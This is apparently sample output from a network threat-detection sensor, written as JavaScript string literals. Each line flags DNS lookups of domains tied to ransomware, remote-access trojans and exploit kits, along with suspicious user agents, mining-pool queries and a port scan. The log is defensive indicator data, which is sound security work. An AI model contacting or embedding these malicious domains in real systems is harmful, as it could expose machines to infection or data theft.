    '"2021-01-11 00:34:15.915237" r2d2 10.3.160.42 14670 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:34:16.113076" r2d2 10.3.160.42 14670 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:34:16.412837" r2d2 10.3.160.42 14670 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:34:16.812717" r2d2 10.3.160.42 14670 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:34:17.913514" r2d2 10.3.160.42 14670 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:34:43.382160" r2d2 2.200.110.232 64434 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:34:43.403133" r2d2 2.200.110.232 64004 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:34:43.406953" r2d2 2.200.107.146 20156 192.41.162.30 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 00:34:43.401378" r2d2 2.200.110.232 65210 2.200.107.168 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 00:34:46.886682" r2d2 2.200.110.233 64212 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:35:02.788705" r2d2 10.44.70.211 51281 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;bfaceb91-6871-400d-88d4-0eda679b36a6;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:35:05.264564" r2d2 10.1.56.50 56691 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:35:07.740987" r2d2 2.200.110.232 63733 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 00:35:43.395243" r2d2 2.200.110.232 49445 2.200.107.168 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:35:56.896407" r2d2 2.200.110.232 65171 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:35:56.925053" r2d2 2.200.110.233 49317 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:35:59.610352" r2d2 2.200.110.232 63446 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:35:59.613393" r2d2 2.200.107.146 24520 204.16.253.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:36:06.407015" r2d2 2.200.110.232 65468 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:36:06.408771" r2d2 2.200.107.146 64649 185.104.28.19 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:36:07.519942" r2d2 2.200.110.232 63651 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 00:36:05.368928" r2d2 10.1.19.42 58974 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:36:15.722400" r2d2 2.200.110.233 64246 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:36:15.866722" r2d2 2.200.107.146 8034 193.232.128.6 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 00:36:15.913268" r2d2 2.200.107.146 6855 97.74.105.26 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:36:15.911497" r2d2 2.200.110.233 63772 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:36:26.546951" r2d2 2.200.110.232 63531 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:36:26.549188" r2d2 2.200.107.146 35019 46.101.179.64 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:36:26.811188" r2d2 178.17.174.14 52872 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; InfoPath.3; FunWebProducts; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:36:59.625915" r2d2 2.200.110.232 64278 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:37:06.547754" r2d2 2.200.110.232 64288 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:37:06.549332" r2d2 2.200.107.146 36304 52.57.28.60 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:37:06.577638" r2d2 2.200.110.233 65359 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:37:06.711199" r2d2 2.200.110.233 65370 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 00:37:06.751779" r2d2 2.200.110.233 64508 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:37:06.753544" r2d2 2.200.107.146 54143 97.74.100.21 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:37:06.932424" r2d2 2.200.110.233 63512 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:37:13.302954" r2d2 178.17.174.14 55160 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2; PeoplePal 3.0; PeoplePal 7.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbORJ/5.15.25.36191\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:37:25.791692" r2d2 2.200.110.232 64054 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:37:25.843073" r2d2 2.200.110.233 64441 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:37:30.944932" r2d2 2.200.110.233 64886 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:37:30.946522" r2d2 2.200.107.146 33818 204.61.216.98 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:37:36.466090" r2d2 2.200.97.4 65336 192.203.230.10 53 UDP DNS (sdk0.520.gdxox).ml "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:37:43.382957" r2d2 2.200.110.232 49323 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:37:53.574780" r2d2 2.200.107.168 53 2.200.110.232 63656 UDP DNS (leicon).it "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:37:53.574774" r2d2 2.200.107.168 53 2.200.110.232 63656 UDP DNS (leicon).it "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:37:57.978433" r2d2 178.17.174.14 59304 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; FunWebProducts; ibrytetoolbar_playbryte; EIE10;ENUSWOL\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:37:57.978426" r2d2 178.17.174.14 59304 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; FunWebProducts; ibrytetoolbar_playbryte; EIE10;ENUSWOL\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:37:57.978432" r2d2 178.17.174.14 59304 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; FunWebProducts; ibrytetoolbar_playbryte; EIE10;ENUSWOL\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:38:16.092366" r2d2 10.3.160.42 14672 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:38:16.192320" r2d2 10.3.160.42 14672 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:38:16.294093" r2d2 10.3.160.42 14672 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:38:16.492406" r2d2 10.3.160.42 14672 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:38:16.956494" r2d2 2.200.110.232 64882 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:38:16.958296" r2d2 2.200.107.146 48474 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:38:16.988481" r2d2 2.200.110.233 63660 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:38:18.187658" r2d2 2.200.105.226 58941 208.67.222.123 53 UDP DNS pool.supportxmr.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:38:18.187667" r2d2 2.200.105.226 58941 208.67.222.123 53 UDP DNS pool.supportxmr.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:38:18.187795" r2d2 2.200.105.226 58941 208.67.222.123 53 UDP DNS pool.supportxmr.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:38:22.137350" r2d2 2.200.110.233 49162 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 00:38:35.720316" r2d2 2.200.110.233 63894 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:38:42.755172" r2d2 2.200.110.232 63686 2.200.107.168 53 UDP DNS (td-username-db4-63-169).wix.com "free web hosting (suspicious)" (static)\n' +
    '"2021-01-11 00:38:59.608726" r2d2 2.200.110.232 64983 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:38:59.610914" r2d2 2.200.107.146 28687 194.62.183.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:39:03.729929" r2d2 10.1.19.42 58976 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:39:11.348502" r2d2 178.17.174.14 38288 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; FunWebProducts; GTB7.3; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; FunWebProducts\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:39:26.998441" r2d2 2.200.107.146 52743 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:39:26.993663" r2d2 2.200.110.232 49241 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:39:27.036026" r2d2 2.200.110.233 63541 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:39:37.833629" r2d2 177.135.196.242 33046 2.200.107.165 80 TCP UA "Hello, World" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:39:43.382945" r2d2 2.200.110.232 64824 2.200.107.169 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:39:43.382929" r2d2 2.200.110.232 64656 2.200.107.169 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:39:43.385312" r2d2 2.200.107.146 5735 97.74.108.9 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:39:43.386644" r2d2 2.200.110.232 65178 2.200.107.169 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 00:39:43.386876" r2d2 2.200.110.232 64962 2.200.107.169 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 00:39:43.388731" r2d2 2.200.110.232 49366 2.200.107.169 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:39:43.393947" r2d2 2.200.110.232 49236 2.200.107.169 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:39:43.394243" r2d2 2.200.110.232 63542 2.200.107.169 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:39:43.398744" r2d2 2.200.110.232 65000 2.200.107.169 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:39:43.399149" r2d2 2.200.110.232 64973 2.200.107.169 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:39:43.400903" r2d2 2.200.107.146 22104 192.43.172.30 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:39:43.401596" r2d2 2.200.107.146 20195 192.43.172.30 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:39:43.396174" r2d2 2.200.110.232 63702 2.200.107.169 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:39:43.398008" r2d2 2.200.110.232 63734 2.200.107.169 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 00:39:45.727998" r2d2 2.200.110.233 63476 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:39:45.739749" r2d2 2.200.110.233 64690 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 00:39:45.809074" r2d2 2.200.110.233 63935 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:40:17.323096" r2d2 178.17.174.14 42698 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; FunWebProducts; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; FunWebProducts; AskTbPSI/5.15.25.44892; MS STORE DMC2.6.3411.2\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:40:17.323101" r2d2 178.17.174.14 42698 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; FunWebProducts; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; FunWebProducts; AskTbPSI/5.15.25.44892; MS STORE DMC2.6.3411.2\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:40:17.322957" r2d2 178.17.174.14 42698 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; FunWebProducts; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; FunWebProducts; AskTbPSI/5.15.25.44892; MS STORE DMC2.6.3411.2\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:40:36.604077" r2d2 2.200.110.232 64943 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:40:36.605385" r2d2 2.200.107.146 37564 52.50.73.4 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:40:36.654284" r2d2 2.200.110.233 64516 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:40:37.035530" r2d2 2.200.110.232 63493 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:40:37.037146" r2d2 2.200.107.146 14385 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:40:37.063882" r2d2 2.200.110.233 63588 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:40:43.206235" r2d2 10.1.81.47 55461 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 00:40:43.206226" r2d2 10.1.81.47 55461 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 00:40:43.387493" r2d2 2.200.110.232 65314 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:40:53.856858" r2d2 178.17.174.14 45644 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; FunWebProducts; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:40:53.856860" r2d2 178.17.174.14 45644 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; FunWebProducts; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:40:53.856845" r2d2 178.17.174.14 45644 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; FunWebProducts; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:41:43.394679" r2d2 2.200.110.232 64547 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:41:43.789243" r2d2 10.36.192.126 59164 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;9c8fbeff-b8d6-4cfe-bfac-f1f994df8c76;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:41:44.885770" r2d2 2.200.110.232 64785 2.200.107.169 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:41:45.288159" r2d2 2.200.110.232 64955 2.200.107.169 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:41:45.290020" r2d2 2.200.107.146 13150 173.245.59.92 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:41:42.762576" r2d2 178.17.174.14 49484 2.200.109.24 80 TCP UA "Synapse (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; SynapseWorkstation.3.2.1\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:41:46.583378" r2d2 2.200.110.233 64268 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:41:46.639092" r2d2 2.200.110.233 63786 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:41:51.617024" r2d2 2.200.110.232 63677 2.200.107.169 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 00:41:51.655518" r2d2 2.200.110.233 64992 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 00:41:59.610059" r2d2 2.200.110.232 64671 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:42:48.572289" r2d2 2.200.107.146 39998 185.159.198.150 53 UDP DNS ns1.frobbit.se "rogue dns (malicious)" (static)\n' +
    '"2021-01-11 00:42:47.957085" r2d2 178.17.174.14 53990 2.200.109.24 80 TCP UA "Synapse (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; chromeframe/30.0.1599.69; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; SynapseWorkstation.3.2.1\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:42:57.089307" r2d2 2.200.110.232 63783 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:42:57.115550" r2d2 2.200.110.233 63370 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:43:23.007545" r2d2 2.200.110.233 63701 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 00:43:23.010265" r2d2 2.200.107.146 14891 3.82.52.102 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 00:43:31.000880" r2d2 2.200.108.59 20585,20588,20590,20591,20593,20596,20599,20602,20607,20611,20612,20614,20615,20616,33196,33334,34290,35230,36058,36288,36896,37268,37524,37981,37983,37984,37985,39146,39174,39204,39324,39674,39976,40642,41356,41410,43324,43604,44318,44334,44337,44338,44339,44340,44854,44960,45032,45064,45670,46038,46210,46594,46672,46888,47034,48014,48092,48372,48746,49238,49582,50260,50478,50754,51414,51426,51958,52458,53034,53414,53536,54144,54540,54580,55052,55386,55776,56840,56894,57318,57624,57968,58046,58296,58384,58812,59134,59432,59568,59918,59978,60296,60558 77.53.81.105 21,5896,6005,7770,8158,8402,8743,9556,9598,9630,11113,11150,14051,14604,15622,17636,19650,19975,20638,23417,23949,24429,24778,26029,26360,26536,29675,30729,30991,31326,31767,32320,32553,33610,33651,34551,35099,35803,35872,36371,36869,37952,39975,40015,41574,42650,44038,44491,44844,44900,45735,46991,47905,49399,50017,50195,50298,51355,51651,52465,53355,53766,54450,54655,56070,56700,60026,60610,63475,64070,65404 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:43:31.000882" r2d2 2.200.108.59 20583,20586,20588,20589,20591,20593,20595,20601,20602,20603,20604,20605,20609,20610,20613,20614,33172,33408,34068,34178,34242,34486,34732,34930,35272,35448,36042,36058,36288,36320,36896,36898,37524,37982,37984,39324,39812,39976,40294,41356,41410,42250,42656,43554,43600,44318,44335,44336,44337,44340,44520,45032,45350,45670,46210,46614,46832,46946,47168,48014,48092,48222,48902,49038,49080,49238,49582,50290,50426,50478,50644,51426,51822,51958,52310,52832,53034,53328,53536,53750,53958,55036,55052,55546,56894,57296,57624,57658,58384,58802,59118,59152,59500,59546,59568,60292,60296,60346,60388 77.53.81.105 21,5479,5664,5896,7759,7770,8158,8270,8402,8743,9556,10107,11113,11150,13872,13992,14051,14202,14273,15622,17389,18201,18294,20611,21711,22862,23297,24774,26220,27066,27790,29149,29675,30729,31074,31164,31326,31596,31767,34036,36248,36331,36371,36869,38085,38503,38869,39142,39377,39975,40015,40903,44900,45679,46416,46991,47704,47847,49381,50017,50298,51651,52191,52465,54450,54844,55714,56070,56746,56884,60026,60610,62118,62393,62455,63169,63289,63804 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:43:32.000013" r2d2 2.200.108.59 20601,20604,20606,20607,20611,20613,20616,33196,33408,34290,34732,34930,35230,35272,35782,36042,36320,36898,37272,38114,39174,40294,40400,40642,42724,43600,43604,44338,44520,46832,46888,47034,48222,48372,48442,48902,49038,50260,50290,50754,50920,51432,53084,53750,53808,53866,54144,54540,55036,55546,56840,57318,57658,57968,58296,58802,59432,59500,59740,59918,60292 77.53.81.105 21,5479,5664,7746,7759,8402,9669,10915,13872,14202,17636,18201,19650,19744,19975,21711,24429,26717,27066,29779,31596,33027,33651,34036,35429,35803,35872,38085,38503,38815,39142,41574,42650,44038,45735,49381,49399,50913,53355,53766,54655,54844,55714,56700,56746,56884,56912,62118,63169,63289,63475,64786,65404 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:43:43.380820" r2d2 2.200.110.232 64237 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:43:43.393539" r2d2 2.200.110.232 65489 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:43:43.395233" r2d2 2.200.107.146 59566 52.57.28.60 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:43:39.796020" r2d2 10.1.19.42 58979 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:43:59.621764" r2d2 2.200.110.232 65530 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:43:59.625690" r2d2 2.200.107.146 34000 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:44:06.682853" r2d2 2.200.110.233 63870 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:44:06.799226" r2d2 2.200.110.232 65501 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 00:44:06.852797" r2d2 2.200.110.233 63939 2.200.107.169 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 00:44:07.125127" r2d2 2.200.110.233 65099 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:44:16.661893" r2d2 10.3.160.42 14675 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:44:16.761521" r2d2 10.3.160.42 14675 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:44:16.861978" r2d2 10.3.160.42 14675 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:44:17.364370" r2d2 10.3.160.42 14675 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
